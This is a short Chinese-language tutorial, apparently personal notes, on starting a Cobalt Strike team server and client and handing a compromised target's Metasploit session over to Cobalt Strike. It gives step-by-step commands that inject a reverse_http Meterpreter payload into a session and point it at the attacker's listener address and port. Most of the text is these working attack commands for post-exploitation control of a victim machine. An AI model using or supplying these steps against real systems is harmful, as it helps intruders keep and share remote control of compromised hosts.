Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
1、cs团队服务器启动步骤:
赋予cs目录下teamserver文件777权限
使用./teamserver ip地址 登录该服务器设置的密码 即可打开
如./teamserver 192.168.0.1 123456
2、cs团队服务器客户端启动步骤:
进入目录输入 ./cobaltstrike即可
接下来即跳出登陆界面,进行账号密码输入即可。
3、msf监听转移到cs上:
首先获得靶机权限后使用bg返回主界面
use exploit/windows/local/payload_inject 加载MSF的payload 注入功能
set payload windows/meterpreter/reverse_http 设置payload
show options 查看配置参数
set lhost 10.0.0.36 设置cs服务器地址
set lport 4567设置cs监听端口
set session 1 设置监控会话
set DisablePayloadHandler true设置当前msf不接受监听数据
run 执行设置 如果没有在cs显示该会话可多次尝试
CS开始实战操作
